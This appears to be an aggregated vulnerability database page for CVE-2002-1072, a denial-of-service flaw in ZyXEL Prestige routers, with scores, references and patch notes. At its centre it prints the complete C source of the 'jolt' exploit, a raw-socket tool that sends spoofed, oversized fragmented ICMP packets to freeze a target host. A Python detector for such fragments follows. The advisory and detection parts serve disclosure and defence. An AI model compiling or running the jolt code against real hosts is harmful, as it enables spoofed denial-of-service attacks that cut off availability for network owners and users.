CVE-2002-1072
CVSS 5.0
Published: 2002-10-04 00:00:00
Revised: 2008-09-05 16:29:42

[Original] ZyXEL Prestige 642R 2.50(FA.1) and Prestige 310 V3.25(M.01), allows remote attackers to cause a denial of service via an oversized, fragmented "jolt" style ICMP packet.


[CNNVD] Zyxel Prestige 642R Router Malformed TCP Packet Remote Denial of Service Vulnerability (CNNVD-200210-090)

The Zyxel Prestige 642R router uses ZyNOS S/W as its operating system.
The Zyxel Prestige 642R router has a problem handling malformed TCP packets; a remote attacker can exploit this vulnerability to carry out a denial of service attack.
When the Zyxel Prestige 642R router receives a malformed TCP packet generated by the jolt tool (http://packetstorm.decepticons.org/exploits/DoS/jolt.c), it stops communicating for 30 seconds; sending such packets continuously can cause the Zyxel Prestige 642R router to stop responding, producing a denial of service.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may cause reduced performance or interruption of resource access]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/h:zyxel:prestige:642r
cpe:/h:zyxel:prestige:310

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1072
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1072
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-090
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/5292
(VENDOR_ADVISORY)  BID  5292
http://www.iss.net/security_center/static/9655.php
(VENDOR_ADVISORY)  XF  zyxel-jolt-dos(9655)
http://online.securityfocus.com/archive/1/283999
(UNKNOWN)  BUGTRAQ  20020724 Denial of Service in ZyXEL prestige 642R w/ZyNOS v2.50(FA.1)
http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0036.html
(UNKNOWN)  VULNWATCH  20020724 [VulnWatch] Denial of Service in ZyXEL prestige 642R w/ZyNOS v2.50(FA.1)

- Vulnerability information

Zyxel Prestige 642R Router Malformed TCP Packet Remote Denial of Service Vulnerability
Medium Other
2002-10-04 00:00:00 2005-10-20 00:00:00
Remote

The Zyxel Prestige 642R router uses ZyNOS S/W as its operating system.
The Zyxel Prestige 642R router has a problem handling malformed TCP packets; a remote attacker can exploit this vulnerability to carry out a denial of service attack.
When the Zyxel Prestige 642R router receives a malformed TCP packet generated by the jolt tool (http://packetstorm.decepticons.org/exploits/DoS/jolt.c), it stops communicating for 30 seconds; sending such packets continuously can cause the Zyxel Prestige 642R router to stop responding, producing a denial of service.

- Advisories and patches

Temporary workaround:
If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* No suitable temporary workaround is available at this time.
Vendor patch:
ZyXEL
-----
The vendor has not yet provided a patch or upgrade; we recommend that users of this product monitor the vendor's homepage for the latest version:

http://www.zywall.com/

- Vulnerability information (21637)

Zyxel Prestige 642R Router Malformed IP Packet Denial Of Service Vulnerability (EDBID:21637)
hardware dos
2002-07-24 Verified
0 Jeff w. Roberson
N/A
source: http://www.securityfocus.com/bid/5292/info

ZyXEL 642R and Prestige 310 routers have difficulty handling malformed IP packets. Reportedly, when ZyXEL routers receive a single specially malformed packet, they stop responding for exactly 30 seconds.

ZyXEL 642R and Prestige 310 routers are reportedly affected by this vulnerability. It is possible that other ZyNOS-based routers are also affected by this vulnerability.

/* Jolt 1.0 (c) 1997 by Jeff w. Roberson
 * Please, if you use my code give me credit.  Also, if i was the first to
 * find this glitch, please give me credit.  Thats all i ask.
 *
 * Ok so all this does is build a really fraggmented over sized packet
 * and once win95 gets it, and puts it back together it locks.  I send
 * multiple packets by default cause some times it takes a few packets to
 * totally freeze the host.  Maybe its spending processor time to figure
 * out how to put them back together?  I've had reports of people blue
 * screening from it tho so we'll let Microsoft's boys figure out exactly
 * what this does to 95.  As of now i haven't tested it on NT, but maybe
 * i will later ;).  All of this source wasn't origonally written by me
 * I just took one of the old programs to kill POSIX and SYSV based
 * systems and worked on it abit, then made it spoof =). 
 * VallaH  (yaway@hotmail.com)
 *
 *  Update: It apears to work on some older versions of mac os
 */

/* Yah this is for linux, but i like the BSD ip header better then linux's */
#define _BSD_SOURCE
#define _DEFAULT_SOURCE            /* newer glibc spells the BSD feature macro this way */
#include <stdio.h>
#include <stdlib.h>                /* exit(), atoi() */
#include <strings.h>               /* bzero(), bcopy() */
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <string.h>
#include <arpa/inet.h>

int main(int argc, char **argv)
{
    int s, i;
    char buf[400];                                   /* one fragment: 20-byte IP header + 380 bytes */
    struct ip *ip = (struct ip *)buf;
    struct icmphdr *icmp = (struct icmphdr *)(ip + 1);
    struct hostent *hp, *hp2;
    struct sockaddr_in dst;
    int offset;
    int on = 1;
    int num = 5;                                     /* packets to send; 5 unless argv[3] is given */

    bzero(buf, sizeof buf);
    bzero(&dst, sizeof dst);

    if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
        perror("socket");
        exit(1);
    }
    if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc < 3) {
        printf("Jolt v1.0 Yet ANOTHER windows95(And macOS!) glitch by VallaH (yaway@hotmail.com)\n");
        printf("\nusage: %s <dstaddr> <saddr> [number]\n", argv[0]);
        printf("\tdstaddr is the host your attacking\n");
        printf("\tsaddr is the host your spoofing from\n");
        printf("\tNumber is the number of packets to send, 5 is the default\n");
        printf("\nNOTE:  This is based on a bug that used to affect POSIX complient, and SYSV \n\t systems so its nothing new..\n");
        printf("\nGreets to Bill Gates! How do ya like this one? :-)\n");
        exit(1);
    }
    if (argc == 4) num = atoi(argv[3]);
    for (i = 1; i <= num; i++) {

        /* destination: try a hostname first, then a dotted quad */
        if ((hp = gethostbyname(argv[1])) == NULL) {
            if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == INADDR_NONE) {
                fprintf(stderr, "%s: unknown host\n", argv[1]);
                exit(1);
            }
        } else {
            bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
        }

        /* source address written into the header (the posted code copied hp->h_length here) */
        if ((hp2 = gethostbyname(argv[2])) == NULL) {
            if ((ip->ip_src.s_addr = inet_addr(argv[2])) == INADDR_NONE) {
                fprintf(stderr, "%s: unknown host\n", argv[2]);
                exit(1);
            }
        } else {
            bcopy(hp2->h_addr_list[0], &ip->ip_src.s_addr, hp2->h_length);
        }

        printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
        ip->ip_v = 4;
        ip->ip_hl = sizeof *ip >> 2;
        ip->ip_tos = 0;
        ip->ip_len = htons(sizeof buf);
        ip->ip_id = htons(4321);
        ip->ip_off = htons(0);
        ip->ip_ttl = 255;
        ip->ip_p = 1;                                /* IPPROTO_ICMP */
        ip->ip_sum = 0;                              /* kernel fills in (BSD struct ip names it ip_sum) */

        dst.sin_addr = ip->ip_dst;
        dst.sin_family = AF_INET;

        icmp->type = ICMP_ECHO;
        icmp->code = 0;
        icmp->checksum = htons(~(ICMP_ECHO << 8));
        /* fragment offsets step by 380 bytes up to 64K; all but the last carry MF,
         * and the last is lengthened so the reassembled datagram exceeds 65535 bytes */
        for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
            ip->ip_off = htons(offset >> 3);
            if (offset < 65120)
                ip->ip_off |= htons(0x2000);
            else
                ip->ip_len = htons(418);             /* make total 65538 */
            if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
                       sizeof dst) < 0) {
                fprintf(stderr, "offset %d: ", offset);
                perror("sendto");
            }
            if (offset == 0) {
                icmp->type = 0;
                icmp->code = 0;
                icmp->checksum = 0;
            }
        }
    }
    return 0;
}
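
Seen from the defending side, as an added example that is not part of this record or of jolt: the check a fragment-reassembly filter or IDS applies to the packet layout above. It parses the 20-byte IPv4 header of each fragment, computes where that fragment would end in the reassembled datagram, and flags any fragment that pushes the datagram past the 65535-byte limit of RFC 791. The header sequence is constructed in-process from the same offsets and lengths jolt's send loop uses; the addresses are placeholders.

```python
import socket
import struct

IPV4_MAX = 65535      # largest reassembled IPv4 datagram RFC 791 allows
MF_FLAG = 0x2000      # "more fragments" bit in the flags/fragment-offset field
OFFSET_MASK = 0x1FFF  # 13-bit fragment offset, counted in 8-byte units
IPV4_FMT = "!BBHHHBBH4s4s"  # 20-byte IPv4 header without options


def ipv4_header(src, dst, ident, total_len, frag_field, proto=1):
    """Constructed 20-byte IPv4 header (payload omitted); checksum left 0 as in jolt."""
    return struct.pack(IPV4_FMT, 0x45, 0, total_len, ident, frag_field, 255, proto, 0,
                       socket.inet_aton(src), socket.inet_aton(dst))


def fragment_end(header):
    """Parse one IPv4 header; return (end offset in the reassembled datagram, more-fragments bit)."""
    ver_ihl, _tos, total_len, _ident, frag, _ttl, _proto, _csum, _src, _dst = \
        struct.unpack(IPV4_FMT, header[:20])
    ihl = (ver_ihl & 0x0F) * 4
    payload_len = total_len - ihl
    start = (frag & OFFSET_MASK) * 8          # fragment offset is stored in 8-byte units
    return start + payload_len, bool(frag & MF_FLAG)


def scan_fragments(headers):
    """Return [(index, reassembled_size)] for every fragment whose end exceeds 65535 bytes."""
    alerts = []
    for i, hdr in enumerate(headers):
        end, _more = fragment_end(hdr)
        if end > IPV4_MAX:
            alerts.append((i, end))
    return alerts


def jolt_like_headers(src="10.0.0.2", dst="10.0.0.1"):
    """Header sequence with the offsets/lengths jolt's loop produces (constructed, not captured)."""
    headers = []
    for offset in range(0, 65536, 380):        # 400-byte buffer minus 20-byte header
        frag = offset >> 3
        total_len = 400
        if offset < 65120:
            frag |= MF_FLAG
        else:
            total_len = 418                    # final fragment, lengthened past the 64K boundary
        headers.append(ipv4_header(src, dst, 4321, total_len, frag))
    return headers


if __name__ == "__main__":
    print(scan_fragments(jolt_like_headers()))   # only the last fragment trips the check
```

Only the final fragment overflows (offset 65360 plus a 398-byte payload reassembles to 65758 bytes); a correctly fragmented datagram never produces an alert, which is why this check is cheap enough to run per fragment without keeping reassembly state.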

- Vulnerability information

9983
ZyXEL Prestige 642R Oversized Fragmented ICMP Packet DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

The ZyXEL Prestige 642R DSL router (and possibly other ZyXEL routers) running ZyNOS version 2.50(FA.1) contains a flaw that may allow a remote denial of service. The issue is triggered when a remote attacker sends a single "jolt" packet to a vulnerable router, and results in loss of availability for the device for a short period of time.

- Timeline

2002-07-24 Unknown
2002-07-24 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability author

- Vulnerability information

Zyxel Prestige 642R Router Malformed IP Packet Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 5292
Yes No
2002-07-24 12:00:00 2009-07-11 02:56:00
Discovery credited to 0x36@hushmail.com.

- Affected program versions

ZyXEL Prestige 642R
ZyXEL Prestige 310

- Vulnerability discussion

ZyXEL 642R and Prestige 310 routers have difficulty handling malformed IP packets. Reportedly, when ZyXEL routers receive a single specially malformed packet, they stop responding for exactly 30 seconds.

ZyXEL 642R and Prestige 310 routers are reportedly affected by this vulnerability. It is possible that other ZyNOS-based routers are also affected by this vulnerability.

- Exploit

The following exploit has been provided by Jeff w. Roberson:

- Solution

The vendor has reported that new firmware versions are available which resolve this issue. Customers are advised to contact their local ZyXEL distributor in order to obtain updates.

This issue is resolved in firmware versions P642R-11 v2.50(AJ.9)C0 and P310 v3.50(M.01).

- References
